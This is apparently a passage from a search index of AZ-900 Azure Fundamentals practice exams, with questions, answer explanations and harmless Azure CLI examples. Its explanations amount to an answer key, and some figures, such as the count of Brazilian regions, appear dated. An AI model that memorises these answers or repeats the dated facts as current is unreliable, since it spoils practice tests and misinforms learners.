        • Do not enable SSH access for Linux servers
        • Do not allow public Internet access over the RDP and SSH ports directly to the server. Instead use a secure server like Bastion to control access to the servers behind.

        Explanation: You need to either control access to the RDP and SSH ports to a very specific range of IPs, enable the ports only when you are using it, or use a Bastion server/jump box to protect those servers. For more info:\u00a0https://docs.microsoft.com/en-us/azure/bastion/bastion-overview
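
        A minimal sketch of deploying Bastion in front of a virtual network; it assumes the VNet already contains a subnet named AzureBastionSubnet, and the other names are placeholders:

        ```bash
        # Bastion needs a Standard-SKU public IP
        az network public-ip create \
          --resource-group my-rg \
          --name bastion-pip \
          --sku Standard

        # Deploy Bastion; RDP/SSH then happens through the portal,
        # with no RDP/SSH ports exposed to the public Internet
        az network bastion create \
          --resource-group my-rg \
          --name my-bastion \
          --vnet-name my-vnet \
          --public-ip-address bastion-pip \
          --location eastus
        ```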

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-what-does-arm-stand-for-in-azure","title":"Question 30:\u00a0What does ARM stand for in Azure?","text":"
        • Account Resource Manager
        • Availability, Reliability, Maintainability
        • Advanced RISC Machine
        • Azure Resource Manager

        Explanation: Azure Resource Manager (ARM) - this is the common resource deployment model that underlies all resource creation or modification; no matter whether you use the Portal, PowerShell, or the SDK, Azure Resource Manager takes those commands and executes them. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/overview
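
        To make the shared model concrete: a template deployment from the CLI ends up at the same ARM endpoint as a portal click. The template file and parameter below are placeholders:

        ```bash
        # Deploy an ARM template into a resource group
        az deployment group create \
          --resource-group my-rg \
          --template-file azuredeploy.json \
          --parameters environment=dev
        ```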

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-in-what-way-does-multi-factor-authentication-increase-the-security-of-a-user-account","title":"Question 31:\u00a0In what way does Multi-Factor Authentication increase the security of a user account?","text":"
        • It requires the user to possess something like their phone to read an SMS, use a mobile app, or biometric identification.
        • It requires single sign-on functionality
        • It doesn't. Multi-Factor Authentication is more about access and authentication than account security.
        • It requires users to be approved before they can log in for the first time.

        Explanation: MFA requires that the user have access to their mobile phone for using SMS or an app. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-what-is-the-maximum-amount-of-azure-storage-space-a-single-subscription-can-store","title":"Question 32:\u00a0What is the maximum amount of Azure Storage space a single subscription can store?","text":"
        • 500 GB
        • Virtually unlimited
        • 5 PB
        • 2 TB

        Explanation: A single Azure subscription can have up to 250 storage accounts per region, and each storage account can store up to 5 petabytes. That is 1,250 PB (1.25 million TB) per region, and far more again across all regions, which is why the practical answer is "virtually unlimited". For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/azure-subscription-service-limits#storage-limits

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-how-do-you-get-access-to-services-in-private-preview-mode","title":"Question 33:\u00a0How do you get access to services in Private Preview mode?","text":"
        • You cannot use private preview services.
        • They are available in the marketplace. You simply use them.
        • You must apply to use them.
        • You must agree to a terms of use first.

        Explanation: Private Preview means you must apply to use them. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-what-is-the-concept-of-being-able-to-get-your-applications-and-data-running-in-another-environment-quickly","title":"Question 34:\u00a0What is the concept of being able to get your applications and data running in another environment quickly?","text":"
        • Business Continuity / Disaster Recovery (BC/DR)
        • Azure Blueprint
        • Azure Devops
        • Reproducible deployments

        Explanation: Disaster Recovery - the ability to recover from a big failure within an acceptable period of time, with an acceptable amount of data lost. For more info on Backup and Disaster Recovery:\u00a0https://azure.microsoft.com/en-us/solutions/backup-and-disaster-recovery/ For more info on Azure\u2019s built-in disaster recovery as a service (DRaaS):\u00a0https://azure.microsoft.com/en-us/services/site-recovery/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-which-of-the-following-is-considered-a-downside-to-using-capital-expenditure-capex","title":"Question 35:\u00a0Which of the following is considered a downside to using Capital Expenditure (CapEx)?","text":"
        • It does not require a lot of up front money
        • You can deduct expenses as they occur
        • You are not guaranteed to make a profit
        • You must wait over a period of years to depreciate that investment on your taxes

        Explanation: One of the downsides of CapEx is that the money invested cannot be deducted immediately from your taxes. For more info:\u00a0https://docs.microsoft.com/en-us/learn/modules/principles-cloud-computing/3c-capex-vs-opex

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-what-azure-resource-allows-you-to-evenly-split-traffic-coming-in-and-direct-it-to-several-identical-virtual-machines-to-do-the-work-and-respond-to-the-request","title":"Question 36:\u00a0What Azure resource allows you to evenly split traffic coming in and direct it to several identical virtual machines to do the work and respond to the request?","text":"
        • Load Balancer or Application Gateway
        • Azure Logic Apps
        • Virtual Network
        • Azure App Services

        Explanation: This is the core feature of either a Load Balancer or Application Gateway. For more info:\u00a0https://docs.microsoft.com/en-us/azure/load-balancer/load-balancer-overview
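
        A hedged Azure CLI sketch (all names are placeholders): a Standard load balancer plus one rule that splits inbound TCP/80 traffic across a backend pool.

        ```bash
        az network lb create \
          --resource-group demo-rg \
          --name demo-lb \
          --sku Standard \
          --frontend-ip-name demo-fe \
          --backend-pool-name demo-be

        # Spread incoming port-80 traffic evenly across the backend pool members.
        az network lb rule create \
          --resource-group demo-rg \
          --lb-name demo-lb \
          --name http-rule \
          --protocol Tcp \
          --frontend-port 80 \
          --backend-port 80 \
          --frontend-ip-name demo-fe \
          --backend-pool-name demo-be
        ```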

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-true-or-false-azure-charges-for-bandwidth-used-inbound-to-azure","title":"Question 37:\u00a0True or false: Azure charges for bandwidth used \"inbound\" to Azure","text":"
        • FALSE
        • TRUE

        Explanation: Ingress bandwidth is free. You pay for egress (outbound). For more info:\u00a0https://azure.microsoft.com/en-us/pricing/details/bandwidth/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-which-free-azure-security-service-checks-all-traffic-travelling-over-a-subnet-against-a-set-of-rules-before-allowing-it-in-or-out","title":"Question 38:\u00a0Which free Azure security service checks all traffic travelling over a subnet against a set of rules before allowing it in, or out.","text":"
        • Network Security Group
        • Advanced Threat Protection (ARP)
        • Azure Firewall
        • Azure DDoS Protection

        Explanation: Network Security Group (NSG) - a fairly basic set of rules that you can apply to both inbound traffic and outbound traffic that lets you specify what sources, destinations and ports are allowed to travel through from outside the virtual network to inside the virtual network. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-network/security-overview
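
        As a minimal sketch (hypothetical names): an NSG with a single inbound rule, attached to a subnet so it filters that subnet's traffic.

        ```bash
        az network nsg create --resource-group demo-rg --name demo-nsg

        # Allow inbound HTTPS; everything else falls through to the default rules.
        az network nsg rule create \
          --resource-group demo-rg \
          --nsg-name demo-nsg \
          --name allow-https \
          --priority 100 \
          --direction Inbound \
          --access Allow \
          --protocol Tcp \
          --destination-port-ranges 443

        # Associate the NSG with a subnet so the rules apply to traffic crossing it.
        az network vnet subnet update \
          --resource-group demo-rg \
          --vnet-name demo-vnet \
          --name demo-subnet \
          --network-security-group demo-nsg
        ```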

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-what-is-the-concept-of-availability","title":"Question 39:\u00a0What is the concept of Availability?","text":"
        • A system must have 100% uptime to be considered available
        • A system that can scale up and scale down depending on customer demand
        • The percentage of time a system responds properly to requests, expressed as a percentage over time
        • A system that has a single point of failure

        Explanation: Availability - what percentage of time does a system respond properly to requests, expressed as a percentage over time. For more information on region and availability zones see:\u00a0https://docs.microsoft.com/en-us/azure/availability-zones/az-overview. For more information on availability options for virtual machines see:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machines/availability.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-what-is-the-benefit-of-using-powershell-over-cli","title":"Question 40:\u00a0What is the benefit of using Powershell over CLI?","text":"
        • More powerful commands
        • Quicker to deploy VMs
        • Cheaper
        • No benefit, it's the same

        Explanation: There is no benefit, only a matter of personal choice. For more info on Azure CLI:\u00a0https://docs.microsoft.com/en-us/cli/azure/what-is-azure-cli?view=azure-cli-latest. For more info on Azure Powershell:\u00a0https://docs.microsoft.com/en-us/powershell/azure/?view=azps-4.5.0

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-how-many-regions-does-azure-have-in-brazil","title":"Question 41:\u00a0How many regions does Azure have in Brazil?","text":"
        • 2
        • 0
        • 1
        • 4

        Explanation: There is 1 region in Brazil. For more info:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/geographies/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-what-azure-product-allows-you-to-autoscale-virtual-machines-from-1-to-1000-instances-and-also-provides-load-balancing-services-built-in","title":"Question 42:\u00a0What Azure product allows you to autoscale virtual machines from 1 to 1000 instances, and also provides load balancing services built in?","text":"
        • Virtual Machine Scale Sets
        • Azure App Services
        • Azure Virtual Machines
        • Application Gateway

        Explanation: Virtual Machine Scale Sets - these are a set of identical virtual machines (from 1 to 1000 instances) that are designed to auto-scale up and down based on user demand. For more info:\u00a0https://azure.microsoft.com/en-us/services/virtual-machine-scale-sets/
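
        A minimal sketch (placeholder names; image alias may vary by CLI version): a three-instance scale set, which also provisions a load balancer by default, plus an autoscale rule.

        ```bash
        az vmss create \
          --resource-group demo-rg \
          --name demo-vmss \
          --image Ubuntu2204 \
          --instance-count 3 \
          --generate-ssh-keys

        # Autoscale between 1 and 10 instances, adding 2 when average CPU passes 70%.
        az monitor autoscale create \
          --resource-group demo-rg \
          --resource demo-vmss \
          --resource-type Microsoft.Compute/virtualMachineScaleSets \
          --name demo-autoscale \
          --min-count 1 --max-count 10 --count 3

        az monitor autoscale rule create \
          --resource-group demo-rg \
          --autoscale-name demo-autoscale \
          --condition "Percentage CPU > 70 avg 5m" \
          --scale out 2
        ```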

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-what-does-it-mean-if-a-service-is-in-general-availability-ga-mode","title":"Question 43: What does it mean if a service is in General Availability (GA) mode?","text":"
        • Anyone can use the service for any reason
        • You have to apply to get selected in order to use that service
        • Anyone can use the service but it must not be for production use
        • The service has now reached public preview, and Microsoft will provide support for it

        Explanation: Anyone can use a GA service. It is fully supported and can be used for production. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-each-person-has-their-own-user-id-and-password-to-log-into-azure-but-how-many-subscriptions-can-a-single-account-be-associated-with","title":"Question 44:\u00a0Each person has their own user id and password to log into Azure. But how many subscriptions can a single account be associated with?","text":"
        • 10
        • 250 per region
        • No limit
        • One

        Explanation: There is no limit to the number of subscriptions a single user can be associated with.

        For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/azure-subscription-service-limits

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-what-is-the-azure-sla-for-two-or-more-virtual-machines-in-an-availability-set","title":"Question 45:\u00a0What is the Azure SLA for two or more Virtual Machines in an Availability Set?","text":"
        • 100%
        • 99.90%
        • 99.99%
        • 99.95%

        Explanation: 99.95% For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-which-azure-service-is-the-recommended-identity-as-a-service-offering-inside-azure","title":"Question 46:\u00a0Which Azure service is the recommended Identity-as-a-Service offering inside Azure?","text":"
        • Azure Active Directory (AD)
        • Azure Portal
        • Identity and Access Management (IAM)
        • Azure Front Door

        Explanation: Azure AD is the identity service designed for web protocols, that you can use for your applications. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-what-is-the-benefit-of-using-a-command-line-tool-like-powershell-or-cli-as-opposed-to-the-azure-portal","title":"Question 47:\u00a0What is the benefit of using a command line tool like Powershell or CLI as opposed to the Azure portal?","text":"
        • Quicker to deploy VMs
        • Cheaper
        • Automation

        Explanation: The real benefit is automation. Being able to write a script to do something is better than having to do it manually each time. For more info on Azure CLI:\u00a0https://docs.microsoft.com/en-us/cli/azure/what-is-azure-cli?view=azure-cli-latest. For more info on Azure Powershell:\u00a0https://docs.microsoft.com/en-us/powershell/azure/?view=azps-4.5.0
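
        To make the automation point concrete, a tiny sketch (group names are hypothetical): one reviewable, repeatable script replaces three error-prone manual portal sessions.

        ```bash
        # Create identical resource groups for each environment, every run.
        for env in dev test prod; do
          az group create --name "app-${env}-rg" --location eastus
        done
        ```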

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-what-database-service-is-specifically-designed-to-be-extremely-fast-in-responding-to-requests-for-small-amounts-of-data-called-low-latency","title":"Question 48:\u00a0What database service is specifically designed to be extremely fast in responding to requests for small amounts of data (called low latency)?","text":"
        • SQL Database
        • SQL Data Warehouse
        • Cosmos DB
        • SQL Server in a VM

        Explanation: Cosmos DB - extremely low latency (fast) storage designed for smaller pieces of data quickly; SaaS. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cosmos-db/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-if-you-are-a-us-federal-state-local-or-tribal-government-entities-and-their-solution-providers-which-azure-option-should-you-be-looking-to-register-for","title":"Question 49: If you are a US federal, state, local, or tribal government entities and their solution providers, which Azure option should you be looking to register for?","text":"
        • Azure is not available for government officials
        • Azure Government
        • Azure Department of Defence
        • Azure Public Portal

        Explanation: US Federal, State, Local, and Tribal governments, and their solution providers, should register for Azure Government. For more info:\u00a0https://docs.microsoft.com/en-us/azure/azure-government/documentation-government-welcome

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-what-is-the-service-level-agreement-for-two-or-more-azure-virtual-machines-that-have-been-manually-placed-into-different-availability-zones-in-the-same-region","title":"Question 50:\u00a0What is the service level agreement for two or more Azure Virtual Machines that have been manually placed into different Availability Zones in the same region?","text":"
        • 99.95%
        • 99.90%
        • 99.99%
        • 100%

        Explanation: 99.99%. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/virtual-machines/v1_9/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#test-3","title":"Test 3","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-what-is-the-significance-of-the-azure-region-why-is-it-important","title":"Question 1:\u00a0What is the significance of the Azure region? Why is it important?","text":"
        • You must select a region when creating most resources, and the region is the area of the world where those resources will be physically located.
        • Once you select a region, you cannot create resources outside of that region. So selecting the right region is an important decision.
        • Region is just a folder structure in which you organize resources, much like file folders on a computer.
        • Even though you have to choose a region when creating resources, there's generally no consequence of what you select. You can create a network in one region and then create virtual machines for that network in another region.

        Explanation: The region is the area of the world where resources get created. You can create resources in any region that you have access to, but there is sometimes a restriction that related resources, such as a virtual machine and its network, must live in the same region for logical reasons. For more info:\u00a0https://azure.microsoft.com/en-us/global-infrastructure/geographies/#overview

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-true-or-false-through-azure-active-directory-one-can-control-access-to-an-application-but-not-the-resources-of-the-application","title":"Question 2:\u00a0TRUE OR FALSE: Through Azure Active Directory one can control access to an application but not the resources of the application.","text":"
        • FALSE
        • TRUE

        Explanation: Azure AD can control the access of both the apps and the app resources. See:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-whatis#which-features-work-in-azure-ad

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-what-is-the-name-of-the-open-source-project-run-by-the-apache-foundation-that-maps-to-the-hdinsight-tools-within-azure","title":"Question 3:\u00a0What is the name of the open source project run by the Apache foundation that maps to the HDInsight tools within Azure?","text":"
        • Apache Jazz
        • Apache Cayenne
        • Apache Jaguar
        • Apache Hadoop

        Explanation: Apache Hadoop is the open source project that the HDInsight tools map to. For more info:\u00a0https://docs.microsoft.com/en-us/azure/hdinsight/hadoop/apache-hadoop-introduction

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-which-tool-within-the-azure-portal-will-make-specific-recommendations-based-on-your-actual-usage-for-how-you-can-improve-your-use-of-azure","title":"Question 4:\u00a0Which tool within the Azure Portal will make specific recommendations based on your actual usage for how you can improve your use of Azure?","text":"
        • Azure Monitor
        • Azure Service Health
        • Azure Dashboard
        • Azure Advisor

        Explanation: Azure Advisor - a tool that will analyze your use of Azure and make you specific recommendations based on your usage across availability, security, performance and cost categories. For more info:\u00a0https://docs.microsoft.com/en-us/azure/advisor/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-what-does-it-mean-that-security-is-a-shared-model-in-azure","title":"Question 5: What does it mean that security is a \"shared model\" in Azure?","text":"
        • Both users and Azure have responsibilities for security.
        • You must keep your security keys private and ensure it doesn't get out.
        • Azure takes care of security completely.
        • Azure takes no responsibility for security.

        Explanation: The shared security model means that, depending on the application model, you and Azure both have roles in ensuring a secure environment. For more info:\u00a0https://docs.microsoft.com/en-us/azure/security/fundamentals/shared-responsibility

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-what-is-the-name-of-the-collective-set-of-apis-that-provide-machine-learning-and-artificial-intelligence-services-to-your-own-applications-like-voice-recognition-image-tagging-and-chat-bot","title":"Question 6:\u00a0What is the name of the collective set of APIs that provide machine learning and artificial intelligence services to your own applications like voice recognition, image tagging, and chat bot?","text":"
        • Cognitive Services
        • Natural Language Service, LUIS
        • Azure Machine Learning Studio
        • Azure Batch

        Explanation: Azure Cognitive Services is the set of Machine Learning and AI APIs. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cognitive-services/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-what-happens-if-azure-does-not-meet-its-own-service-level-agreement-guarantee-sla","title":"Question 7:\u00a0What happens if Azure does not meet its own Service Level Agreement guarantee (SLA)?","text":"
        • The service will be free that month
        • You will be financially refunded a small amount of your monthly fee
        • It's not possible. Azure will always meet its SLA.

        Explanation: Microsoft offers a refund of 10% or 25% depending on how badly they miss their service guarantee. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/sla/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-what-software-is-used-to-synchronize-your-on-premises-ad-with-your-azure-ad","title":"Question 8:\u00a0What software is used to synchronize your on premises AD with your Azure AD?","text":"
        • Azure AD Federation Services
        • Azure AD Domain Services
        • LDAP
        • AD Connect

        Explanation: AD Connect is used to synchronize your corporate AD with Azure AD. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-azure-ad-connect

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-true-or-false-if-your-feature-is-in-the-general-availability-phase-then-your-feature-will-receive-support-from-all-microsoft-support-channels","title":"Question 9:\u00a0True or false: If your feature is in the General Availability phase, then your feature will receive support from all Microsoft support channels.","text":"
        • TRUE
        • FALSE

        Explanation: This is true: a GA feature is fully supported through all Microsoft support channels. Preview features, by contrast, should not be used in production apps. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-true-or-false-if-you-wanted-to-deploy-a-virtual-machine-to-china-you-would-just-choose-the-china-region-from-the-drop-down","title":"Question 10:\u00a0TRUE OR FALSE: If you wanted to deploy a virtual machine to China, you would just choose the China region from the drop down.","text":"
        • FALSE
        • TRUE

        Explanation: Some regions of the world require special contracts with the local provider such as Germany and China. For more info:\u00a0https://docs.microsoft.com/en-us/azure/china/overview-checklist

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-what-is-a-policy-initiative-in-azure","title":"Question 11: What is a policy initiative in Azure?","text":"
        • A custom designed policy
        • Requiring all resources in Azure to use tags
        • The ability to group policies together
        • Assigning permissions to a role in Azure

        Explanation: The ability to group policies together. For more info:\u00a0https://docs.microsoft.com/en-us/azure/governance/policy/overview#initiative-definition

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-which-database-product-offers-sub-5-millisecond-response-times-as-a-feature","title":"Question 12: Which database product offers \"sub 5 millisecond\" response times as a feature?","text":"
        • Cosmos DB
        • SQL Data Warehouse
        • SQL Server in a VM
        • Azure SQL Database

        Explanation: Cosmos DB is low latency, and even offers sub 5-ms response times at some levels. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cosmos-db/introduction

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-which-of-the-following-resources-are-not-considered-compute-resources","title":"Question 13:\u00a0Which of the following resources are not considered Compute resources?","text":"
        • Function Apps
        • Azure Batch
        • Virtual Machines
        • Virtual Machine Scale Sets
        • Load Balancer

        Explanation: A load balancer is a networking product, and does not execute your code. For more info:\u00a0https://docs.microsoft.com/en-us/azure/load-balancer/load-balancer-overview. For more information on compute resources:\u00a0https://azure.microsoft.com/en-us/product-categories/compute/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-with-azure-public-cloud-anyone-with-a-valid-credit-card-can-sign-up-and-get-services-immediately","title":"Question 14:\u00a0With Azure public cloud, anyone with a valid credit card can sign up and get services immediately","text":"
        • FALSE
        • TRUE

        Explanation: Yes, Azure public cloud is open to the public in all countries that Azure supports. For more info:\u00a0https://docs.microsoft.com/en-us/learn/modules/create-an-azure-account/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-which-azure-service-can-be-enabled-to-enable-multi-factor-authentication-for-administrators-but-not-require-it-for-regular-users","title":"Question 15:\u00a0Which Azure service can be enabled to enable Multi-Factor Authentication for administrators but not require it for regular users?","text":"
        • Azure AD B2B
        • Advanced Threat Protection
        • Azure Firewall
        • Privileged Identity Management

        Explanation: Privileged Identity Management can be used to ensure privileged users have to jump through additional verification because of their role. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-configure

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-what-is-an-azure-subscription","title":"Question 16: What is an Azure Subscription?","text":"
        • Each user account is associated with a unique subscription. If you need more than one subscription, you need to create multiple user accounts.
        • It is the level at which services are billed. All resources created under a subscription are billed to that subscription.

        Explanation: Subscription is the level at which things get billed. Multiple users can be associated with a subscription at various permission levels. For more info:\u00a0https://docs.microsoft.com/en-us/services-hub/health/azure_sponsored_subscription

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-what-operating-systems-does-an-azure-virtual-machine-support","title":"Question 17:\u00a0What operating systems does an Azure Virtual Machine support?","text":"
        • Windows, Linux and macOS
        • macOS
        • Windows
        • Linux
        • Windows and Linux

        Explanation: Azure Virtual Machines support Windows and Linux. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machines/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-which-azure-management-tool-analyzes-your-usage-of-azure-and-makes-suggestions-specifically-targeted-to-help-you-optimize-your-usage-of-azure-regarding-cost-security-and-performance","title":"Question 18:\u00a0Which Azure management tool analyzes your usage of Azure and makes suggestions specifically targeted to help you optimize your usage of Azure regarding cost, security and performance?","text":"
        • Azure Service Health
        • Azure Advisor
        • Azure Firewall
        • Azure Mobile App

        Explanation: Azure Advisor analyzes your specific usage of Azure and makes helpful suggestions on how it can be improved.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-which-feature-within-azure-alerts-you-to-service-issues-that-happen-in-azure-itself-not-specifically-related-to-your-own-resources","title":"Question 19:\u00a0Which feature within Azure alerts you to service issues that happen in Azure itself, not specifically related to your own resources?","text":"
        • Azure Monitor
        • Azure Portal Dashboard
        • Azure Service Health
        • Azure Security Center

        Explanation: Azure Service Health - lets you know about any Azure-related service issues including region-wide downtime. For more info:\u00a0https://docs.microsoft.com/en-us/azure/service-health/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-which-two-features-does-virtual-machine-scale-sets-provide-as-part-of-the-core-product-pick-two","title":"Question 20:\u00a0Which two features does Virtual Machine Scale Sets provide as part of the core product? Pick two.","text":"
        • Content Delivery Network
        • Firewall
        • Automatic installation of supporting apps and deployment of custom code
        • Load balancing between virtual machines
        • Autoscaling of virtual machines

        Explanation: VMSS provides autoscale features and has a built in load balancer. You still need to have a way to deploy your code to the new servers, as you do with regular VMs. For more info:\u00a0https://docs.microsoft.com/en-us/azure/virtual-machine-scale-sets/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-where-can-you-go-to-see-what-standards-microsoft-is-in-compliance-with","title":"Question 21:\u00a0Where can you go to see what standards Microsoft is in compliance with?","text":"
        • Azure Service Health
        • Azure Security Center
        • Trust Center
        • Azure Privacy Page

        Explanation: The list of standards that Azure has been certified to meet is in the Trust Center. For more info:\u00a0https://www.microsoft.com/en-us/trust-center

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-what-does-it-mean-if-a-service-is-in-private-preview-mode","title":"Question 22: What does it mean if a service is in Private Preview mode?","text":"
        • The service is generally available for use, and Microsoft will provide support for it
        • Anyone can use the service but it must not be for production use
        • You have to apply to get selected in order to use that service
        • Anyone can use the service for any reason

        Explanation: Private Preview means you have to apply to use a service, and you may or may not be selected. For more info:\u00a0https://azure.microsoft.com/en-us/support/legal/preview-supplemental-terms

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-what-are-groups-of-subscriptions-called","title":"Question 23: What are groups of subscriptions called?","text":"
        • Azure Policy
        • Subscription Groups
        • ARM Groups
        • Management Groups

        Explanation: Subscriptions can be placed into management groups, which can themselves be nested, to make managing them easier. For more info:\u00a0https://docs.microsoft.com/en-us/azure/governance/management-groups/overview
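
        A brief Azure CLI sketch (the group name and subscription ID are placeholders):

        ```bash
        # Create a management group, then move a subscription under it.
        az account management-group create --name corp-it
        az account management-group subscription add \
          --name corp-it \
          --subscription "00000000-0000-0000-0000-000000000000"
        ```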

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-how-do-you-stop-your-azure-account-from-incurring-costs-above-a-certain-level-without-your-knowledge","title":"Question 24: How do you stop your Azure account from incurring costs above a certain level without your knowledge?","text":"
        • Switch to Azure Reserved Instances with Hybrid Benefit for VMs
        • Only use Azure Functions which have a significant free limit
        • Implement the Azure spending limit in the Account Center
        • Set up a billing alert to send you an email when it reaches a certain level

        Explanation: If you don't want to spend over a certain amount, implement a spending limit in the account center. For more info:\u00a0https://docs.microsoft.com/en-us/azure/cost-management-billing/manage/spending-limit

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-how-does-multi-factor-authentication-make-a-system-more-secure","title":"Question 25:\u00a0How does Multi-Factor Authentication make a system more secure?","text":"
        • It allows the user to log in without a password because they have already previously been validated using a browser cookie
        • It requires the user to have access to their verified phone in order to log in
        • It doesn't make it more secure
        • It is another password that a user has to memorize, making it more secure

        Explanation: Multi-Factor Authentication (MFA) - the concept of having something additional to a \u201cpassword\u201d that is required to log in; passwords can be found or guessed, but having your mobile phone on you to receive a phone call, text, or app code is much harder for an unknown hacker to obtain. For more info:\u00a0https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-how-many-hours-are-available-free-when-using-the-azure-b1s-general-purpose-virtual-machines-under-a-azure-free-account-in-the-first-12-months","title":"Question 26:\u00a0How many hours are available free when using the Azure B1S General Purpose Virtual Machines under a Azure free account in the first 12 months?","text":"
        • 500 hrs
        • 750 hrs
        • 300 hrs
        • Indefinite amount of hrs

        Explanation: Each Azure free account includes 750 hours free for Azure B1S General Purpose Virtual Machines for the first 12 months. For more info:\u00a0https://azure.microsoft.com/en-us/free/free-account-faq/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-what-is-the-goal-of-a-ddos-attack","title":"Question 27:\u00a0What is the goal of a DDoS attack?","text":"
        • To extract data from a database
        • To trick users into giving up personal information
        • To overwhelm and exhaust application resources
        • To crack the password from administrator accounts

